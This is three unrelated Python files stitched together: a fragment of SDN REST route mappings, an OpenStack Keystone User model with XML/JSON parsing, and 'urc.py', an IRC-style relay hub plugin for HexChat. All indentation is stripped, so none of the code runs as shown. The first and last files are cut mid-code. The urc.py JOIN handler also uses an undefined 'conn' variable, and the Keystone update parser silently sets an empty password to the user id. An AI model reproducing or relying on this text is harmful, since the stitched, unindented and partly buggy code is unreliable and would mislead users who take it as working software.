mapper = wsgi.mapper
wsgi.registory['NetworkController'] = self.nw
route_name = 'networks'
uri = '/v1.0/networks'
mapper.connect(route_name, uri,
controller=NetworkController, action='lists',
conditions=dict(method=['GET', 'HEAD']))
uri += '/{network_id}'
s = mapper.submapper(controller=NetworkController)
s.connect(route_name, uri, action='create',
conditions=dict(method=['POST']))
s.connect(route_name, uri, action='update',
conditions=dict(method=['PUT']))
s.connect(route_name, uri, action='delete',
conditions=dict(method=['DELETE']))
wsgi.registory['PortController'] = self.nw
route_name = 'ports'
mapper.connect(route_name, uri,
controller=PortController, action='lists',
conditions=dict(method=['GET']))
uri += '/{dpid}_{port_id}'
requirements = {'dpid': dpid_lib.DPID_PATTERN,
'port_id': app_wsgi.DIGIT_PATTERN}
s = mapper.submapper(controller=PortController,
requirements=requirements)
s.connect(route_name, uri, action='create',
conditions=dict(method=['POST']))
s.connect(route_name, uri, action='update',
conditions=dict(method=['PUT']))
s.connect(route_name, uri, action='delete',
conditions=dict(method=['DELETE']))
wsgi.registory['MacController'] = self.nw
route_name = 'macs'
uri += '/macs'
mapper.connect(route_name, uri,
controller=MacController, action='lists',
conditions=dict(method=['GET']),
requirements=requirements)
uri += '/{mac_addr}'
requirements['mac_addr'] = mac_lib.HADDR_PATTERN
s = mapper.submapper(controller=MacController,
requirements=requirements)
s.connect(route_name, uri, action='create',
conditions=dict(method=['POST']))
s.connect(route_name, uri, action='update',
conditions=dict(method=['PUT']))
|
|
# Copyright (c) 2010-2011 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from lxml import etree
from keystone.logic.types import fault
class User(object):
"""Document me!"""
def __init__(self, password=None, id=None, name=None, tenant_id=None,
email=None, enabled=None, tenant_roles=None):
self.id = id
self.name = name
self.tenant_id = tenant_id
self.password = password
self.email = email
self.enabled = enabled and True or False
self.tenant_roles = tenant_roles
@staticmethod
def from_xml(xml_str):
try:
dom = etree.Element("root")
dom.append(etree.fromstring(xml_str))
root = dom.find("{http://docs.openstack.org/identity/api/v2.0}" \
"user")
if root == None:
raise fault.BadRequestFault("Expecting User")
name = root.get("name")
tenant_id = root.get("tenantId")
email = root.get("email")
password = root.get("password")
enabled = root.get("enabled")
if not name:
raise fault.BadRequestFault("Expecting User")
elif not password:
raise fault.BadRequestFault("Expecting User password")
elif not email:
raise fault.BadRequestFault("Expecting User email")
enabled = enabled is None or enabled.lower() in ["true", "yes"]
return User(password, id, name, tenant_id, email, enabled)
except etree.LxmlError as e:
raise fault.BadRequestFault("Cannot parse User", str(e))
@staticmethod
def from_json(json_str):
try:
obj = json.loads(json_str)
if not "user" in obj:
raise fault.BadRequestFault("Expecting User")
user = obj["user"]
id = user.get('id', None)
name = user.get('name', None)
if not "password" in user:
raise fault.BadRequestFault("Expecting User Password")
password = user["password"]
if (id == None or len(id.strip()) == 0) and (
name == None or len(name.strip()) == 0):
raise fault.BadRequestFault("Expecting User")
elif password == None or len(password.strip()) == 0:
raise fault.BadRequestFault("Expecting User password")
if "tenantId" in user:
tenant_id = user["tenantId"]
else:
tenant_id = None
if "email" not in user:
raise fault.BadRequestFault("Expecting User Email")
email = user["email"]
if "enabled" in user:
set_enabled = user["enabled"]
if not isinstance(set_enabled, bool):
raise fault.BadRequestFault("Bad enabled attribute!")
else:
set_enabled = True
return User(password, id, name, tenant_id, email, set_enabled)
except (ValueError, TypeError) as e:
raise fault.BadRequestFault("Cannot parse Tenant", str(e))
def to_dom(self):
dom = etree.Element("user",
xmlns="http://docs.openstack.org/identity/api/v2.0")
if self.email:
dom.set("email", unicode(self.email))
if self.tenant_id:
dom.set("tenantId", unicode(self.tenant_id))
if self.id:
dom.set("id", unicode(self.id))
if self.name:
dom.set("name", unicode(self.name))
if self.enabled:
dom.set("enabled", unicode(self.enabled).lower())
if self.password:
dom.set("password", unicode(self.password))
if self.tenant_roles:
dom_roles = etree.Element("tenantRoles")
for role in self.tenant_roles:
dom_role = etree.Element("tenantRole")
dom_role.text = role
dom_roles.append(dom_role)
dom.append(dom_roles)
return dom
def to_xml(self):
return etree.tostring(self.to_dom())
def to_dict(self):
user = {}
if self.id:
user["id"] = unicode(self.id)
if self.name:
user["name"] = unicode(self.name)
if self.tenant_id:
user["tenantId"] = unicode(self.tenant_id)
if self.password:
user["password"] = unicode(self.password)
user["email"] = unicode(self.email)
user["enabled"] = self.enabled
if self.tenant_roles:
user["tenantRoles"] = list(self.tenant_roles)
return {'user': user}
def to_json(self):
return json.dumps(self.to_dict())
class User_Update(object):
"""Document me!"""
def __init__(self, password=None, id=None, name=None, tenant_id=None,
email=None, enabled=None):
self.id = id
self.name = name
self.tenant_id = tenant_id
self.password = password
self.email = email
self.enabled = bool(enabled) if enabled is not None else None
@staticmethod
def from_xml(xml_str):
try:
dom = etree.Element("root")
dom.append(etree.fromstring(xml_str))
root = dom.find("{http://docs.openstack.org/identity/api/v2.0}" \
"user")
if root == None:
raise fault.BadRequestFault("Expecting User")
id = root.get("id")
name = root.get("name")
tenant_id = root.get("tenantId")
email = root.get("email")
password = root.get("password")
enabled = root.get("enabled")
if enabled == None or enabled == "true" or enabled == "yes":
set_enabled = True
elif enabled == "false" or enabled == "no":
set_enabled = False
else:
raise fault.BadRequestFault("Bad enabled attribute!")
# TODO: WTF is this?!
if password == '':
password = id
return User(password=password, id=id, name=name,
tenant_id=tenant_id, email=email, enabled=set_enabled)
except etree.LxmlError as e:
raise fault.BadRequestFault("Cannot parse User", str(e))
@staticmethod
def from_json(json_str):
try:
obj = json.loads(json_str)
if not "user" in obj:
raise fault.BadRequestFault("Expecting User")
user = obj["user"]
id = user.get('id', None)
name = user.get('name', None)
password = user.get('password', None)
tenant_id = user.get('tenantId', None)
email = user.get('email', None)
enabled = user.get('enabled', True)
if not isinstance(enabled, bool):
raise fault.BadRequestFault("Bad enabled attribute!")
# TODO: WTF is this?!
if password == '':
password = id
return User(password, id, name, tenant_id, email, enabled)
except (ValueError, TypeError) as e:
raise fault.BadRequestFault("Cannot parse Tenant", str(e))
def to_dom(self):
dom = etree.Element("user",
xmlns="http://docs.openstack.org/identity/api/v2.0")
if self.email:
dom.set("email", unicode(self.email))
if self.tenant_id:
dom.set("tenantId", unicode(self.tenant_id))
if self.id:
dom.set("id", unicode(self.id))
if self.name:
dom.set("name", unicode(self.name))
if self.enabled is not None:
dom.set("enabled", unicode(self.enabled).lower())
if self.password:
dom.set("password", unicode(self.password))
return dom
def to_xml(self):
return etree.tostring(self.to_dom())
def to_dict(self):
user = {}
if self.id:
user["id"] = unicode(self.id)
if self.name:
user["name"] = unicode(self.name)
if self.tenant_id:
user["tenantId"] = unicode(self.tenant_id)
if self.password:
user["password"] = unicode(self.password)
if self.email:
user["email"] = unicode(self.email)
if self.enabled is not None:
user["enabled"] = self.enabled
return {'user': user}
def to_json(self):
return json.dumps(self.to_dict())
class Users(object):
"""A collection of users."""
def __init__(self, values, links):
self.values = values
self.links = links
def to_xml(self):
dom = etree.Element("users")
dom.set(u"xmlns", "http://docs.openstack.org/identity/api/v2.0")
for t in self.values:
dom.append(t.to_dom())
for t in self.links:
dom.append(t.to_dom())
return etree.tostring(dom)
def to_json(self):
values = [t.to_dict()["user"] for t in self.values]
links = [t.to_dict()["links"] for t in self.links]
return json.dumps({"users": {"values": values, "links": links}})
|
|
#!/usr/bin/env python3
#
# urc.py -- one long long horrible python script
#
# monolithic urc hub in python
#
# public domain
#
# for hexchat
__module_name__ = "urc"
__module_version__ = "0.1"
__module_description__ = "urc network plugin"
import binascii
import struct
import asyncio
from random import randrange, Random, randint
import random
import string
import socket
import time
import logging
import os
import threading
from hashlib import sha256
try:
import hexchat
except ImportError:
hexchat = None
def prnt(*args):
if hexchat:
s = ''
for arg in args:
s += '{}'.format(arg)
hexchat.prnt(s)
else:
print (args)
# for urc_sign
try:
prnt("trying to load libnacl")
import libnacl
except ImportError:
prnt("no libnacl, will not do signed messages")
libnacl = None
else:
prnt("libnacl loaded")
# -- urc message types
URC_PLAIN = struct.unpack('!H', b'\x00\x00')[0]
URC_SIGN = struct.unpack('!H', b'\x01\x00')[0]
URC_PY_SIGN = struct.unpack('!H', b'\x01\x01')[0]
# -- not cryptographically secure random for non encryption uses
rand = lambda n : os.urandom(n)
# i don't like regular expressions
import re
# -- begin lameass regexp block
_RE_CHARS = 'a-zA-Z0-9\.\\|\\-_~\\[\\]'
_CHAN_PREFIX = '&#+'
_RE_CHAN_PREFIX = '[%s]' % _CHAN_PREFIX
_RE_CHAN = '%s+[%s]+' % (_RE_CHAN_PREFIX, _RE_CHARS)
_RE_NICK = '[%s]+' % _RE_CHARS
_RE_SRC = '[%s]+![~%s]+@[%s]+' % ( (_RE_CHARS, ) * 3)
_RE_CMD = '[A-Z]+'
_RE_URCLINE = '^:(%s) (%s) ?(%s|%s)? ?:(.+)$' % (_RE_SRC, _RE_CMD, _RE_CHAN, _RE_NICK)
_RE_SRC_CMD = '([%s]+)!([~%s]+)@([%s]+)' % ( ( _RE_CHARS, ) * 3 )
_RE_NICK_CMD = '^NICK :?(%s)' % _RE_NICK
_RE_USER_CMD = '^USER (%s) [%s\\*]+ [%s\\*]+\s:?%s' % ( _RE_NICK, _RE_CHARS, _RE_CHARS, _RE_NICK )
_RE_PRIVMSG_CMD = '^PRIVMSG (%s|%s) :?(.+)$' % (_RE_NICK, _RE_CHAN)
_RE_JOIN_CMD = '^JOIN (%s)' % _RE_CHAN
_RE_JOIN_MULTI_CMD = '^JOIN :?(.+)'
_RE_PART_CMD = '^PART (%s) :?(.+)$' % _RE_CHAN
_RE_PART_SIMPLE_CMD = '^PART (%s)$' % _RE_CHAN
_RE_TOPIC_CMD = '^TOPIC (%s) :?(.+)$' % _RE_CHAN
_RE_QUIT_CMD = '^QUIT (.+)$'
_RE_LIST_CMD = '^(LIST)'
_RE_PING_CMD = '^PING (.*)$'
_RE_PONG_CMD = '^PONG (.*)$'
_RE_MODE_CMD = '^MODE (%s)?\\s(\\w+)$' % _RE_CHAN
_RE_WHO_CMD = '^WHO (%s)$' % _RE_CHAN
_RE_AWAY_ON_CMD = '^AWAY (.+)$'
_RE_AWAY_OFF_CMD = '^(AWAY) ?$'
# -- end lameass regexp block
# -- being crypto stuff
_SIG_SIZE = libnacl and libnacl.crypto_sign_BYTES or 0
def nacl_keygen(seed=None):
"""
generate nacl keypair
"""
if not seed:
seed = libnacl.randombytes(libnacl.crypto_sign_SEEDBYTES)
sk, vk = libnacl.crypto_sign_seed_keypair(seed)
return sk, vk, seed
def nacl_verify(m, s, pk):
"""
verify message m with signature s for public key pk
"""
if libnacl:
libnacl.crypto_sign_open(s+m, pk)
def nacl_sign(m, sk):
"""
sign message m with secret key sk
return signed message
"""
if libnacl:
s = libnacl.crypto_sign(m,sk)[:_SIG_SIZE]
assert len(s) == _SIG_SIZE
return s
def pubkey2bin(pk):
return binascii.unhexlify(pk)
def bin2pubkey(bin):
return binascii.hexlify(bin).decode('ascii')
# -- end crypto stuff
# -- begin irc functions
def irc_is_chan(chan):
"""
return true if something is a channel name
"""
for p in _CHAN_PREFIX:
if chan[0] == p:
return True
return False
def _irc_re_parse(regex, line, upper=True):
if upper:
line = line.upper()
m = re.match(regex, line)
if m:
return m.groups()
irc_parse_away_on = lambda line : _irc_re_parse(_RE_AWAY_ON_CMD, line)
irc_parse_away_off = lambda line : _irc_re_parse(_RE_AWAY_OFF_CMD, line)
irc_parse_nick_user_serv = lambda line : _irc_re_parse(_RE_SRC_CMD, line)
irc_parse_channel_name = lambda line : _irc_re_parse(_RE_CHAN, line)
irc_parse_nick = lambda line : _irc_re_parse(_RE_NICK_CMD, line)
irc_parse_user = lambda line : _irc_re_parse(_RE_USER_CMD, line)
irc_parse_privmsg = lambda line : _irc_re_parse(_RE_PRIVMSG_CMD, line)
irc_parse_join = lambda line : _irc_re_parse(_RE_JOIN_CMD, line)
irc_parse_multi_join = lambda line : _irc_re_parse(_RE_JOIN_MULTI_CMD, line)
irc_parse_part = lambda line : _irc_re_parse(_RE_PART_CMD, line)
irc_parse_part_simple = lambda line : _irc_re_parse(_RE_PART_SIMPLE_CMD, line)
irc_parse_quit = lambda line : _irc_re_parse(_RE_QUIT_CMD, line)
irc_parse_ping = lambda line : _irc_re_parse(_RE_PING_CMD, line, False)
irc_parse_pong = lambda line : _irc_re_parse(_RE_PONG_CMD, line, False)
irc_parse_list = lambda line : _irc_re_parse(_RE_LIST_CMD, line)
irc_parse_mode = lambda line : _irc_re_parse(_RE_MODE_CMD, line)
irc_parse_who = lambda line : _irc_re_parse(_RE_WHO_CMD, line)
irc_parse_topic = lambda line : _irc_re_parse(_RE_TOPIC_CMD, line)
def irc_greet(serv, nick, user, motd):
"""
generate an irc greeting for a new user
yield lines to send
"""
for num , msg in (
('001', ':{}'.format(serv)),
('002', ':{}!{}@{}'.format(nick,user,serv)),
('003', ':{}'.format(serv)),
('004', '{} 0.0 :+'.format(serv)),
('005', 'NETWORK=urc.{} CHANTYPES=#&!+ CASEMAPPING=ascii '.format(serv)+
'CHANLIMIT=25 NICKLEN=25 TOPICLEN=128 CHANNELLEN=16 COLOUR=1 UNICODE=1 PRESENCE=0:')):
yield ':{} {} {} {}\n'.format(serv, num, nick, msg)
yield ':{} 254 {} 25 :CHANNEL(s)\n'.format(serv, nick)
yield ':{}!{}@{} MODE {} +i\n'.format(nick, user, serv, nick)
yield ':{} 376 {} :- {} MOTD -\n'.format(serv, nick, serv)
for line in motd:
yield ':{} 372 {} :- {}\n'.format(serv, nick, line)
yield ':{} 376 {} :RPL_ENDOFMOTD\n'.format(serv, nick)
# -- end irc functions
def taia96n():
"""
get unnecessarily accurate time for now
"""
now = time.time()
sec = int(4611686018427387914) + int(now)
nano = int(1000000000*(now%1)+randrange(0,512))
return sec, nano
def taia96n_now():
"""
get unnecessarily accurate timestamp for time right now
"""
now = time.time()
sec, nano = taia96n()
return struct.pack('!QI', sec, nano)
def taia96n_parse(data):
"""
parse unnecessarily accurate timestamp
"""
if len(data) != 12: return None
return struct.unpack('!QI',data)
def filter_urcline(string, filler=''):
"""
filter undesirable characters out of urcline string
"""
for bad in '\r\x00':
string = string.replace(bad, filler)
return string
def parse_urcline(line):
"""
return (source, command, destination, message) tuple from URCLINE or None if invalid syntax
"""
m = re.match(_RE_URCLINE, line)
if m:
return m.groups()
def mk_hubpkt(pktdata, pkttype=URC_PLAIN):
"""
make urc hub packet
"""
data = bytes()
pktlen = len(pktdata)
if pkttype == URC_PY_SIGN:
pktlen += _SIG_SIZE
data += struct.pack('!H', pktlen) # packet length
data += taia96n_now() # timestamp
data += struct.pack('!H', pkttype) # packet type
data += b'\x00\x00'
data += rand(8) # 64 bit random
data += pktdata
return data
class _log:
"""
non native logger
"""
def __init__(self):
self.debug = self._logit
self.info = self._logit
self.warn = self._logit
self.error = self._logit
def _logit(self, *args):
prnt ('<urc.py> '+''.join(args))
def inject_log(obj, native_log=True):
"""
inject logger object
"""
log = None
if native_log:
log = logging.getLogger(obj.__class__.__name__)
else:
log = _log()
obj.log = log
class _bloom_filter:
"""
http://code.activestate.com/recipes/577684-bloom-filter/
"""
def __init__(self, num_bytes, num_probes):
self.array = bytearray(num_bytes)
self.num_probes = num_probes
self.num_bins = num_bytes * 8
def get_probes(self, key):
h = int(sha256(key).hexdigest(), 16)
for _ in range(self.num_probes):
yield h & 262143 # 2 ** 18 - 1
h >>= 18
def add(self,key):
for i in self.get_probes(key):
self.array[i//8] |= 2 ** (i%8)
def __contains__(self, key):
return all(self.array[i//8] & (2 ** (i%8)) for i in self.get_probes(key))
class urc_hub_connection:
def __init__(self, urcd, r, w):
self.urcd = urcd
self.r, self.w = r, w
inject_log(self)
@asyncio.coroutine
def get_hub_packet(self):
"""
yield a hub packet tuple , (raw_packet, packet_data, packet_type)
"""
pkt = yield from self._read_hdr()
if pkt:
hdr, pktlen, tsec, tnano, pkttype = pkt
data = yield from self._read_data(pktlen)
return hdr + data , data, pkttype, (tsec, tnano)
@asyncio.coroutine
def _read_hdr(self):
try:
raw = yield from self.r.readexactly(26)
except:
self.close()
self.urcd.disconnected(self)
else:
pktlen = struct.unpack('!H', raw[:2])[0]
self.log.debug('read packet len={}'.format(pktlen))
tsec, tnano = taia96n_parse(raw[2:14])
self.log.debug('packet time {}'.format(tsec))
pkttype = struct.unpack('!H', raw[14:16])[0]
self.log.debug('pkttype={}'.format(pkttype))
return raw, pktlen, tsec, tnano, pkttype
@asyncio.coroutine
def _read_data(self, pktlen):
data = yield from self.r.readexactly(pktlen)
self.log.debug('data={}'.format([data]))
return data
def close(self):
self.w.transport.close()
def send_hub_packet(self,pktdata):
"""
send a hub packet
pktdata must be bytes and a valid packet
"""
self.log.info('send packet')
self.log.info('write %d bytes' % len(pktdata))
self.log.info('write %s' % [pktdata])
self.w.write(pktdata)
try:
data = yield from self.w.drain()
self.log.info('drained')
except Exception as e:
self.log.error(e)
self.urcd.disconnected(self)
except asyncio.streams.IncompleteReadError:
self.log.error('incomplete')
self.w.transport.close()
self.urcd.disconnected(self)
class irc_handler:
"""
simple ircd ui logic
"""
def __init__(self, daemon, r, w):
self.daemon = daemon
self.loop = daemon.loop
self.r, self.w = r, w
self.nick = None
self.user = None
self.ponged = False
self._pong = str(randint(100,1000))
self.greeted = False
self.chans = list()
self._last_ping = time.time()
self._pings = dict()
inject_log(self)
self._id = daemon.randnick()
asyncio.async(self.send_line('PING :{}\n'.format(self._pong)))
asyncio.async(self._get_line())
def disconnect(self):
"""
disconnect this user
"""
self.log.info('disconnect user')
self.w.close()
self.w = None
self.r = None
def ping(self):
"""
ping this user
"""
ping = int(time.time())
self._pings[str(ping)] = ping
asyncio.async(self.send_line('PING :{}\n'.format(ping)))
@asyncio.coroutine
def _get_line(self):
if self.r is None:
return
line = yield from self.r.readline()
if len(line) != 0:
try:
yield from self._handle_line(line)
except Exception as e:
self.log.error(e)
self.daemon.disconnected(self)
raise e
else:
asyncio.async(self._get_line())
def change_nick(self, new_nick):
if self.daemon.anon or self.daemon.has_nick(new_nick):
line = ':{} 433 {} :{}\n'.format(self.daemon.name, self.nick, new_nick)
asyncio.async(self.send_line(line))
else:
line = ':{}!{}@{} NICK {}\n'.format(self.nick,self.user, self.daemon.name, new_nick)
asyncio.async(self.send_line(line))
self.nick = new_nick
self.daemon.inform_chans_for_user(self, line)
@asyncio.coroutine
def send_line(self, line, upper=True):
"""
send a single line
"""
if self.w is None:
return
if upper:
line = line.upper()
self.w.write(line.encode('utf-8'))
self.log.debug(' <-- {}'.format(line))
try:
return self.w.drain()
except:
self.daemon.disconnected(self)
@asyncio.coroutine
def send_lines(self, lines):
"""
send a single line
"""
_lines = list()
for line in lines:
line = line.upper()
_lines.append(line.encode('utf-8'))
self.log.debug(' <-- {}'.format(line))
self.w.writelines(_lines)
try:
return self.w.drain()
except:
self.daemon.disconnected(self)
def _got_pong(self, pong):
if pong[0] == ':':
pong = pong[1:]
if pong == self._pong:
self.ponged = True
def _ack_ping(self, ping):
"""
ack a ping that may or may not have been sent
"""
if ping in self._pings:
self._pings.pop(ping)
self._last_ping = time.time()
def is_timed_out(self):
"""
has this connection timed out?
"""
return ( time.time() - self._last_ping ) > self.daemon.ping_timeout
@asyncio.coroutine
def _handle_line(self, line):
"""
handle a line from irc client
"""
line = line.decode('utf-8')
line = filter_urcline(line)
line = line.replace("\r\n", "\n")
self.log.debug(' --> %s' %[line])
_nick = irc_parse_nick(line)
_user = irc_parse_user(line)
_join = irc_parse_join(line)
_joins = irc_parse_multi_join(line)
_list = irc_parse_list(line)
_part = irc_parse_part(line)
_part_simple = irc_parse_part_simple(line)
_quit = irc_parse_quit(line)
_privmsg = irc_parse_privmsg(line)
_ping = irc_parse_ping(line)
_pong = irc_parse_pong(line)
_mode = irc_parse_mode(line)
_who = irc_parse_who(line)
_away_on = irc_parse_away_on(line)
_away_off = irc_parse_away_off(line)
_topic = irc_parse_topic(line)
if _away_on:
asyncio.async(self.send_line(':{} 306 {} :RPL_UNAWAY\n'.format(self.daemon.name, self.nick)))
if _away_off:
asyncio.async(self.send_line(':{} 305 {} :RPL_AWAY\n'.format(self.daemon.name, self.nick)))
if _pong:
self._got_pong(_pong[0])
# WHO
if _who:
lines = list()
lines.append(':{} 352 {} {} {} {} {} {} H :0 {}\n'.format(self.daemon.name, self.nick,
_who[0], self.nick,
self.daemon.name, self.nick,
self.nick, self.nick))
lines.append((':{} 315 {} {} :RPL_ENDOFWHO\n'.format(self.daemon.name, self.nick, _who[0])))
asyncio.async(self.send_lines(lines))
# MODE
if _mode:
asyncio.async(self.send_line(':{} 324 {} {} +n\n'.format(self.daemon.name, self.nick, _mode[0])))
# LIST
if _list:
self.log.info('list')
lines = list()
lines.append(':{} 321 {} CHANNELS :USERS TOPIC\n'.format(self.daemon.name, self.nick))
for c in self.daemon.irc_chans:
chan = self.daemon.irc_chans[c]
if irc_is_chan(c) and len(chan) > 0:
lines.append(':{} 322 {} {} {} :{}\n'.format(self.daemon.name, self.nick, c, 9000 + randint(10, 100), "URC RELAY CHAT"))
lines.append(':{} 323 {} :RPL_LISTEND\n'.format(self.daemon.name, self.nick))
asyncio.async(self.send_lines(lines))
# PING
if _ping:
if _ping[0][0] != ':':
_ping = ':{}'.format( _ping[0] )
else:
_ping = _ping[0]
asyncio.async(self.send_line(':{} PONG {}\n'.format(self.daemon.name, _ping), False))
# PONG
if _pong:
if _pong[0][0] == ':':
self._ack_ping(_pong[0][1:])
else:
self._ack_ping(_pong[0])
# QUIT
if _quit:
self.w.write_eof()
self.w.transport.close()
self.daemon.disconnected(self)
# NICK
if self.nick is None and _nick is not None:
if self.daemon.anon:
self.nick = self.daemon.randnick()
else:
_nick = self.daemon.filter_nick(_nick[0])
self.nick = _nick
elif self.nick is not None and _nick is not None:
_nick = self.daemon.filter_nick(_nick[0])
self.change_nick(_nick)
# USER
if self.user is None and _user is not None:
if self.daemon.anon:
self.user = self.daemon.randnick()
else:
self.user = _user[0]
if self.greeted and self.ponged:
# JOIN
self.log.debug(_joins)
chans = list()
if _joins:
for chan in _joins[0].split(','):
self.log.debug(chan)
if irc_is_chan(chan):
chans.append(chan)
self.log.debug('multijoin {}'.format(chan))
elif _join and _join[0] not in self.chans:
chans.append(_join[0])
for chan in chans:
chan = chan.strip()
self.log.debug('join {}'.format(chan))
if chan in self.chans:
self.log.debug('not joining {}'.format(chan))
continue
self.chans.append(chan)
self.daemon.joined(self, chan)
self.daemon.activity(self.nick, chan)
lines = list()
n = self.daemon.anon and 'anon' or conn.nick
lines.append(':{} 353 {} = {} :{}\n'.format(self.daemon.name, n, chan, n))
lines.append(':{} 366 {} {} :RPL_ENDOFNAMES\n'.format(self.daemon.name, self.nick, chan))
asyncio.async(self.send_lines(lines))
if _topic and _topic[1] in self.chans:
self.daemon.inform_chans_for_user(self, ":{}!{}@{} TOPIC {} :{}\n".format(self.nick, self.user, self.daemon.name, chan, _topic[2]))
# PART
if _part or _part_simple:
if _part_simple:
chan = _part_simple[0]
else:
chan = _part[0]
if chan in self.chans:
self.chans.remove(chan)
nick = self.nick
line = ':{}!anon@{} PART {}\n'.format(nick, self.daemon.name, chan)
asyncio.async(self.send_line(line))
# PRVIMSG
if _privmsg:
dest, msg = _privmsg
nick = self.daemon.anon and 'anon' or self.nick
self.daemon.activity(nick, dest)
line = ':{}!anon@{} PRIVMSG {} :{}\n'.format(nick,
self.daemon.name, dest, msg)
if irc_is_chan(dest):
self.daemon.inform_chans_for_user(self, line)
else:
if dest == '*urcd' and False: # todo: implement
self.daemon.handle_control(self, msg)
else:
for con in self.daemon.irc_cons:
if con.nick == dest:
asyncio.async(con.send_line(line))
# don't stop propagation
self.daemon.broadcast(line)
else:
if self.nick is not None and self.user is not None:
self.greeted = True
asyncio.async(self.send_lines(irc_greet(self.daemon.name, self.nick, self.user, self.daemon.motd())))
class IRCD:
"""
simple ircd UI
"""
def __init__(self, urcd, controller, check_auth, do_auth):
self.name = 'irc.%s.tld' % urcd.name
self.anon = True
self.irc_cons = list()
self.irc_chans = dict()
self.urcd = urcd
self.controller_hook = controller
self.do_auth_hook = do_auth
self.check_auth_hook = check_auth
self.loop = asyncio.get_event_loop()
self.ping_interval = 60
self.ping_tries = 3
self.ping_timeout = self.ping_interval * self.ping_tries
inject_log(self)
self.loop.call_later(1, self.send_pings)
self.loop.call_later(1, self.check_ping_timeout)
def send_pings(self):
"""
send pings
"""
for con in self.irc_cons:
con.ping()
self.loop.call_later(self.ping_interval, self.send_pings)
def check_ping_timeout(self):
"""
check for ping timeouts
remove as needed
"""
for con in self.irc_cons:
if con.is_timed_out():
con.disconnect()
self.disconnected(con)
self.loop.call_later(5, self.check_ping_timeout)
def filter_nick(self, nick):
"""
do nickname rewrite rules
"""
if nick == 'nameless':
nick = self.randnick()
while self.has_nick(nick):
nick = self.randnick()
return nick
def randnick(self, nicklen=7, vowels='aeiou', letters='cvbnmlkhgfdswrtp', numbers='1234567890'):
"""
generate random nickname
"""
ret = str()
for n in range(nicklen):
chars = letters
if n % 2 != 0:
chars = vowels
ret += random.choice(chars).lower()
return ret
def handle_control(self, con, msg):
"""
handle admin actions
"""
if self.check_auth_hook(con):
asyncio.async(self.controller_hook(con, msg))
else:
asyncio.async(self.do_auth_hook(con, msg))
def joined(self, con, chan):
"""
a user has joined a channel
"""
asyncio.async(con.send_line(':{}!anon@{} JOIN :{}\n'.format(con.nick, self.name, chan)))
n = self.anon and 'anon' or con.nick
line = ':{}!anon@{} JOIN :{}\n'.format(n, self.name, chan)
for user in self.irc_cons:
if user.nick == con.nick:
continue
if chan in user.chans:
asyncio.async(user.send_line(line))
asyncio.async(con.send_line(":{} NOTICE {} :THIS CHANNEL MAY LOOK EMPTY BUT IT IS NOT :-DDDD\n".format(self.name, chan)))
def has_nick(self, nick):
"""
return True if this ircd has a user with nickname nick connected
"""
for user in self.irc_cons:
if user.nick == nick:
return True
return False
def motd(self, fname='motd.txt'):
"""
read motd file
"""
yield 'our public key is {}'.format(self.urcd.pubkey())
if os.path.exists(fname):
with open(fname) as f:
for line in f.read().split('\n'):
yield line
else:
yield 'Channels are empty at first'
def incoming_connection(self, r, w):
"""
handle incoming connections
"""
con = irc_handler(self, r, w)
self.irc_cons.append(con)
def inform_chans_for_user(self, user, line):
"""
send a line to every user that is in every channel this user is in
"""
self.log.debug('inform chans for {} : {}'.format(user.nick, [line]))
for con in self.irc_cons:
if con == user:
continue
for chan in con.chans:
if chan in user.chans:
asyncio.async(con.send_line(line))
break
def user_quit(self, con):
"""
tell appropriate users that a user quit
"""
# find all users in every chan they are in
# give them a quit message from this user
users = list()
for chan in con.chans:
# remove connection from channel
_chan = self.irc_chans[chan]
if con.nick in _chan:
_chan.pop(con.nick)
def disconnected(self, con):
"""
handle connection lost
"""
self.log.info('disconnecting {}'.format(con))
self.irc_cons.remove(con)
self.user_quit(con)
def activity(self, nick, chan):
"""
called when we got activity by user with nick in channel chan
"""
tstamp = taia96n_now()
if chan not in self.irc_chans:
self.irc_chans[chan] = dict()
self.irc_chans[chan][nick] = tstamp
def urc_activity(self, src, cmd, dst, msg):
"""
update the state of the ircd from a remote line
"""
src = self.anon and 'anon!anon@{}'.format(self.name) or src
if msg is None:
line = ':{} {} {}\n'.format(src, cmd, dst)
elif dst is None:
line = ':{} {} :{}\n'.format(src, cmd, msg)
else:
line = ':{} {} {} :{}\n'.format(src, cmd, dst, msg)
self.log.debug((src, cmd, dst, msg))
cmd = cmd.upper()
if dst is None:
_chan = irc_is_chan(msg) and msg or None
else:
_chan = irc_is_chan(dst) and dst or None
_nick = None
if _chan is None:
_nick = dst
self.log.debug((_chan, _nick, msg))
nick, user, serv = irc_parse_nick_user_serv(src) or None, None, None
if _chan and nick:
# for LIST
if _chan not in self.irc_chans:
self.irc_chans[_chan] = dict()
# JOIN
if cmd == 'JOIN' and nick not in self.irc_chans[_chan]:
self.activity(nick, _chan)
# PRIVMSG
if cmd == 'PRIVMSG' and nick:
self.activity(nick, _chan)
_chan = _chan.upper()
nick = self.anon and 'anon' or nick
if _nick:
for user in self.irc_cons:
if user.nick == _nick:
asyncio.async(user.send_line(line))
return
if _chan:
for irc in self.irc_cons:
self.log.debug(irc.chans)
if _chan in irc.chans:
asyncio.async(irc.send_line(line))
def broadcast(self, line):
"""
broadcast a line to the network
"""
self.urcd.broadcast(line)
class AdminUI:
"""
urc.py irc admin interface
"""
def __init__(self, urcd):
self.urcd = urcd
@asyncio.coroutine
def handle_admin(self, con, msg):
"""
handle an admin action
"""
def check_auth(self, con):
"""
check if a connection is authenticated with the admin ui
"""
@asyncio.coroutine
def handle_auth(self, con, msg):
"""
handle login attempt from connection
"""
class URCD:
"""
urcd server context
"""
def __init__(self, sign=True, name='urc.py', irc=True, loop=None):
inject_log(self)
self.sign = sign
if sign:
self.loadkey()
self.log.info('our pubkey is {}'.format(self.pubkey()))
else:
self.pk = None
self.sk = None
self.name = name
if irc:
self.admin = AdminUI(self)
self.ircd = IRCD(self, self.admin.handle_admin, self.admin.check_auth, self.admin.handle_auth)
else:
self.admin = None
self.ircd = None
if loop is not None:
self.loop = loop
else:
self.loop = asyncio.get_event_loop()
self.gui = None
self.hubs = list()
self.persist_hubs = dict()
self.hooks = list()
self._urc_cache = _bloom_filter(32 * 1024, 4)
def start(self):
self.loop.call_later(1, self._persist_hubs)
def loadkey(self, keyfile='privkey.dat'):
if os.path.exists(keyfile):
